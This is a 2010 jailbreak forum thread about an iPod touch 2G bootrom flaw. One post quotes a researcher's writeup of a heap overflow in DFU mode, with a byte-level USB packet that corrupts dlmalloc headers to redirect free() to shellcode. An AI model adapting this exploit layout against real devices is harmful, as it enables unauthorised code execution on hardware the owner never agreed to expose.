iOS 4.1 MC Model iPod Touch Exploit

Discussion in 'iOS Jailbreak & Cydia' started by Stromos, Sep 20, 2010.

  1. Stromos

    Stromos Active Member

    Joined:
    Sep 23, 2008
    Messages:
    463
    Likes Received:
    114
    Device:
    iPhone 6
  2. TchnclFl

    TchnclFl New Member

    Joined:
    Sep 7, 2010
    Messages:
    631
    Likes Received:
    0
    Device:
    4G iPod touch
    MC model iPT 2Gs that is

    Please Register or Log in to view images

    .

    Don't forget the iPT4 is also an "MC" model

    Please Register or Log in to view images

    .
  3. ThePodofi

    ThePodofi Well-Known Member

    Joined:
    May 1, 2010
    Messages:
    4,355
    Likes Received:
    958
    so what the hell does this mean
  4. TchnclFl

    TchnclFl New Member

    Joined:
    Sep 7, 2010
    Messages:
    631
    Likes Received:
    0
    Device:
    4G iPod touch
    It means that MC model iPT 2g can be jailbroken on any firmware. Not yet, but this opens the door for devs.
  5. ThePodofi

    ThePodofi Well-Known Member

    Joined:
    May 1, 2010
    Messages:
    4,355
    Likes Received:
    958
  6. tanktan38

    tanktan38 Active Member

    Joined:
    Dec 29, 2009
    Messages:
    1,085
    Likes Received:
    15
    Device:
    3G iPod touch
    This means that ANY MC model device can be jailbroken. They just haven't released a tool yet.
  7. shimmy

    shimmy New Member

    Joined:
    Oct 19, 2009
    Messages:
    131
    Likes Received:
    0
    Device:
    iPhone 4 (Black)
    - pauseeeee ! -__-
  8. tanktan38

    tanktan38 Active Member

    Joined:
    Dec 29, 2009
    Messages:
    1,085
    Likes Received:
    15
    Device:
    3G iPod touch
    This is the page:

    usb_control_msg(0xA1, 1) Exploit

    A heap overflow exists in iPod touch 2G bootrom (old and new MC models) DFU mode when sending a USB control message of request type 0xA1, request 0x1.

    On newer devices, the same USB message triggers a double free() when the image upload is marked as finished, also rebooting the device (but that's not exploitable because the double free() happens in a row). posixninja analyzed and explained this one.

    Credit (Alphabetical)

    * vulnerability: pod2g
    * exploitation: pod2g
    * payload: unreleased

    Vulnerability

    By fuzzing all possibles USB control messages of iPod2,1 DFU mode, it appeared that one special usb control message made it reboot. The reboot happens only with lengths bigger than 0x100 bytes. It's a buffer overflow.

    Exploitation

    In order to exploit it, send this special USB packet (using 0x21, 1) :

    Code:
    [ 0x100 bytes of nulls ]
    /* free'd buffer dlmalloc header: */
    0x84, 0x00, 0x00, 0x00, // 0x00: previous_chunk
    0x05, 0x00, 0x00, 0x00, // 0x04: next_chunk
    /* free'd buffer contents: (malloc'd size=0x1C, real size=0x20, see sub_9C8) */
    0x80, 0x00, 0x00, 0x00, // 0x08: (0x00) direction
    0x80, 0x62, 0x02, 0x22, // 0x0c: (0x04) usb_response_buffer
    0xff, 0xff, 0xff, 0xff, // 0x10: (0x08)
    0x00, 0x00, 0x00, 0x00, // 0x14: (0x0c) data size (_replace with packet size_)
    0x00, 0x01, 0x00, 0x00, // 0x18: (0x10)
    0x00, 0x00, 0x00, 0x00, // 0x1c: (0x14)
    0x00, 0x00, 0x00, 0x00, // 0x20: (0x18)
    0x00, 0x00, 0x00, 0x00, // 0x24: (0x1c)
    /* attack dlmalloc header: */
    0x15, 0x00, 0x00, 0x00, // 0x28: previous_chunk
    0x02, 0x00, 0x00, 0x00, // 0x2c: next_chunk : 0x2 choosed randomly :-)
    0x01, 0x38, 0x02, 0x22, // 0x30: FD : shellcode_thumb_start()
    0x90, 0xd7, 0x02, 0x22, // 0x34: BK : free() LR in stack
    Then trigger the exploit by using USB control message 0xA1, 1 with the same data size.

    free() LR in stack will be replaced by FD, a pointer to the shellcode to execute !
  9. ThePodofi

    ThePodofi Well-Known Member

    Joined:
    May 1, 2010
    Messages:
    4,355
    Likes Received:
    958
  10. slurpeeking

    slurpeeking Member

    Joined:
    Sep 18, 2010
    Messages:
    320
    Likes Received:
    0
    Device:
    2G iPod touch
    So anyone who knows obj-c can attempt to make a jailbreak right now

    Please Register or Log in to view images

Share This Page